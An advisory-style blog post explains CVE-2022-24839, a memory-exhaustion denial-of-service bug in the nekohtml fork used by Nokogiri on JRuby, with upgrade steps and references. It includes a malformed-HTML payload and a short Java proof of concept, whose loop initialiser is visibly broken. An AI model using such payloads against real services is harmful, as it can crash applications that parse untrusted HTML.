org.cyberneko.html is a widely used HTML parser written in Java. Many Java-based tools and some Ruby projects use variants or forks of this parser for HTML processing. One such project is Nokogiri, a popular Ruby gem for HTML, XML, SAX, and Reader parsing. Nokogiri uses a specific fork of nekohtml maintained at sparklemotion/nekohtml.

In early 2022, a vulnerability was discovered in this fork. It could allow someone to intentionally crash your application just by feeding it malformed HTML. This post explains CVE-2022-24839, includes code samples to demonstrate the problem, shows possible exploit scenarios, and provides references and mitigation steps.  

What is CVE-2022-24839?

CVE-2022-24839 is a vulnerability in the fork of org.cyberneko.html, used by Nokogiri, where parsing certain kinds of malformed HTML can cause a java.lang.OutOfMemoryError. This is essentially a Denial of Service (DoS) vulnerability, because if an attacker can control the HTML input to your application, they can potentially bring it down.

Key Points

- Library affected: sparklemotion/nekohtml (the fork used by Nokogiri)
- Vulnerability: Parsing ill-formed / malformed HTML can lead to unbounded memory usage, resulting in OutOfMemoryError and application crash.

Solution: Upgrade to version >= 1.9.22.noko2 of this library if you use Nokogiri with JRuby.

- Upstream: The original org.cyberneko.html library is no longer maintained, and other forks may be similarly vulnerable.

Official Advisory:  
- Nokogiri Security Advisory: GHSA-7488-3mv7-4pj6  
- CVE Details: CVE-2022-24839

How is this Exploited?

The parser’s job is to read through HTML input and construct a tree representation of the HTML. HTML is often quite messy in the real world, so parsers are made to be tolerant. But some "ill-formed" HTML can trick the parser into infinitely deep nesting or exponential memory allocation.

Here is an example of a problematic HTML fragment that could trigger the bug

<!-- lots of unclosed tags -->
<html>
<body>
<div>
<span>
<table>
<tr>
<td>
<!-- repeat many, many times without closing any tag -->

If a user sends this kind of input (on purpose or by accident), the parser keeps allocating memory, trying to make sense of where the tags close. Eventually, the Java Virtual Machine runs out of memory, causing:

Exception in thread "main" java.lang.OutOfMemoryError: Java heap space

Here's a minimal Java program that triggers the issue using the vulnerable library

import org.cyberneko.html.parsers.DOMParser;
import org.xml.sax.InputSource;

import java.io.StringReader;

public class NekoHTMLCVE {
    public static void main(String[] args) throws Exception {
        // Large malformed HTML string
        StringBuilder sb = new StringBuilder("<html><body>");
        for (int i = ; i < 50000; i++) {  // Adjust for your heap size
            sb.append("<div>");
        }
        // No closing tags!
        String badHtml = sb.toString();

        DOMParser parser = new DOMParser();
        parser.parse(new InputSource(new StringReader(badHtml))); // triggers OOM!
    }
}


*Compile with nekohtml on your classpath. On older versions, this will crash with OutOfMemoryError.*

Who is Affected?

- Nokogiri users on JRuby: If your app uses Nokogiri via its JRuby extensions, and is running on a nokogiri version with nekohtml older than 1.9.22.noko2, you're affected.
- Java libraries or apps using sparklemotion/nekohtml directly (rare): Affected if using an old version.
- Other forks: If you use another fork of nekohtml, you should check if you're vulnerable—these forks may share the same legacy code.

Upgrade Nokogiri to the newest version—at least as new as uses nekohtml 1.9.22.noko2.

2. Nokogiri maintainers have fixed this in this commit.

Update your Gemfile and run

bundle update nokogiri

Switch to the secure version (if possible).

- Consider replacing org.cyberneko.html with a better-maintained HTML parser (like jsoup), since the original nekohtml is abandoned.

Why Does This Matter?

HTML parsing is a common activity, especially in scrapers, email processors, and web applications that process untrusted input. If an attacker can make your HTML parser choke, they can potentially crash your system by just sending a malicious HTML payload.

This is a textbook example of how seemingly harmless components (like a library for parsing HTML) can be leveraged for Denial of Service (DoS) attacks.

Nokogiri security advisory:

https://github.com/sparklemotion/nekohtml/security/advisories/GHSA-7488-3mv7-4pj6

CVE record:

https://nvd.nist.gov/vuln/detail/CVE-2022-24839

Commit fixing the vulnerability:

https://github.com/sparklemotion/nekohtml/commit/ca0521f6cc395a44deb569b04f9beafdb3e7de12

Nokogiri RubyGem:

https://nokogiri.org/

Original (unmaintained) nekohtml:

http://nekohtml.sourceforge.net/

Summary

CVE-2022-24839 is a real-world example of how parsing untrusted input can turn into a threat, even with popular, "safe" components. If you use Nokogiri on JRuby, or the sparklemotion fork of nekohtml, upgrade immediately to stay safe, and always beware of legacy code dependencies.

Timeline

Published on: 04/11/2022 22:15:00 UTC
Last modified on: 07/25/2022 18:22:00 UTC